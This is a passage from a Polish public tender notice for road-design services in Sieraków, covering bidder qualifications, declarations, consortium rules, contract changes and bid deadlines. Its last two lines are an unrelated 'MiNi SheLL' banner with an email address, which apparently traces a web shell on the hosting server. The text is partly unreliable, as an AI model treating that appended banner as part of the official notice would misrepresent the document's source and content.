Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/> Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:<br/>1) minimum jedną osobą (koordynator projektu), która posiada uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń (lub odpowiadające im równoważne uprawnienia do projektowania) i opracowała minimum jedną dokumentację projektową, która uzyskała ostateczną decyzję o zezwoleniu na realizację inwestycji drogowej zgodnie z ustawą o szczególnych zasadach realizacji inwestycji drogowych w zakresie dróg publicznych, obejmującą budowę/rozbudowę/przebudowę drogi o długości minimum 500 mb, <br/>2) minimum jedną osobą, która posiada uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (lub odpowiadające im równoważne uprawnienia do projektowania), <br/>3) minimum jedną osobą, która posiada uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (lub odpowiadające im równoważne uprawnienia elektryczne do projektowania), <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga następującego podmiotowego środka dowodowego w odniesieniu do tego warunku: <br/>1)	Aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału <br/>w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (art. 125 ust. 1 ustawy Pzp) – zgodnie z Załącznikiem nr 2 do SWZ ;<br/>Informacje zawarte w oświadczeniu, o którym mowa powyżej stanowią wstępne potwierdzenie, <br/>że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający dodatkowo wykluczy z udziału w postępowaniu Wykonawcę:<br/>- w stosunku, do którego zachodzą przesłanki wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) .</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy - sporządzony na podstawie wzoru stanowiącego Załącznik 1; 1a do SWZ.<br/>2) Aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (art. 125 ust. 1 ustawy Pzp) – zgodnie z Załącznikiem nr 2 do SWZ ;<br/>3) Samooczyszczenie – jeżeli dotyczy<br/>4) Zobowiązanie podmiotu udostępniającego zasoby - jeżeli dotyczy;<br/>5) Pełnomocnictwo - jeżeli dotyczy;<br/>6) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - jeżeli dotyczy;<br/>7) Zastrzeżenie tajemnicy przedsiębiorstwa – jeżeli dotyczy <br/>8) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy<br/>9) oświadczenie grupa kapitałowa <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone <br/>do oferty. <br/>2.	Wspólnicy spółki cywilnej jako Wykonawcy składający ofertę wspólną, na podstawie art. 58 ust. 2 Pzp ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli umocowanie do reprezentacji wynika z treści umowy spółki cywilnej, do oferty Wykonawcy powinni załączyć treść tej umowy. W takim przypadku nie będzie potrzebne odrębne pełnomocnictwo. Jeżeli treść oświadczenia podpisują wszyscy wspólnicy spółki cywilnej, pełnomocnictwo nie musi być przez nich dołączone do oferty.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale X ust. 2 pkt 2 SWZ, składa każdy z Wykonawców. Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. Oświadczenie to jest podmiotowym środkiem dowodowym. Uwzględniając powyższe Zamawiający zyskał uprawnienie wynikające z przepisów ustawy Pzp do weryfikowania na etapie przedkontraktowym rozkładu ciężaru obowiązków, jakie w przyszłości będą ciążyć na poszczególnych Wykonawcach ubiegających się wspólnie o udzielenie zamówienia. Powyższe uprawnienie ma na celu ograniczenie sytuacji w której współpraca Konsorcjanta ma charakter pozorny i kończy się wraz z uzyskaniem zamówienia, które następnie realizowane jest przez Podmioty niedysponujące potencjałem, który był warunkiem koniecznym do uzyskania zamówienia. <br/> Jeżeli postępowanie prowadzone jest w trybie podstawowym, Zamawiający bada m.in. spełnienie warunków udziału w postępowaniu przez wszystkich Wykonawców na podstawie oświadczenia, o którym mowa w art. 125 ust. 1 Pzp. W związku z tym, że oświadczenie z art. 117 ust. 4 Pzp dotyczy spełnienia warunków udziału w postępowaniu przez Wykonawców składających ofertę wspólną, również na tym etapie postępowania Zamawiający ma obowiązek weryfikacji faktu złożenia tego oświadczenia przez wszystkich Wykonawców.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są na wezwanie Zamawiającego złożyć podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu, przy czym podmiotowe środki dowodowe składa:<br/> a) odpowiednio Wykonawca / Wykonawcy, który wykazuje spełnienie warunku udziału w postępowaniu,<br/> b) każdy z Wykonawców z zakresie podstaw wykluczenia.<br/>7. W przypadku, gdy zostanie wybrana jako najkorzystniejsza oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>8. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4. Dopuszcza się zmianę wysokości wynagrodzenia Wykonawcy: <br/> 1) Na podstawie art. 439 ust. 1 i 2 ustawy PZP Wykonawca będzie uprawniony do żądania zmiany wynagrodzenia 1 raz w roku w oparciu o ogłaszany przez Prezesa Głównego Urzędu Statystycznego rocznego wskaźnika wzrostu cen towarów i usług konsumpcyjnych. <br/> 2) Pierwsza zmiana wynagrodzenia jest możliwa po upływie 6-ciu miesięcy od dnia zawarcia niniejszej umowy. <br/>Wykonawca zobowiązany jest do wykazania wpływu zmiany na koszty wykonania zamówienia <br/>w sposób czytelny dla Zamawiającego, poprzez dostarczenie dokumentów potwierdzających powyższe.<br/>5. Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany:<br/>1) stawki podatku od towarów i usług,<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę,<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 roku o pracowniczych planach kapitałowych,<br/> – jeżeli strona, w interesie której leży wprowadzenie danej zmiany wykaże konieczność jej wprowadzenia i udowodni, że zmiana ma rzeczywisty wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz w projektowanych postanowieniach umowy, stanowiących załącznik nr 3 do SWZ.<br/>6. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem https://platformazakupowa.pl/pn/sierakow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający dodatkowo wykluczy z udziału w postępowaniu Wykonawcę:<br/>- w stosunku, do którego zachodzą przesłanki wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) .<br/>2. W przypadku sporów pomiędzy Zamawiającym a Wykonawcą o roszczenia cywilnoprawne w sprawach, w których zawarcie ugody jest dopuszczalne, strony zobowiązują się do poddania mediacjom lub innemu polubownemu rozwiązaniu sporu przed Sądem Polubownym przy Prokuratorii Generalnej Rzeczypospolitej Polskiej, wybranym mediatorem albo osobą prowadzącą inne polubowne rozwiązanie sporu.

Creat By MiNi SheLL
Email: jattceo@gmail.com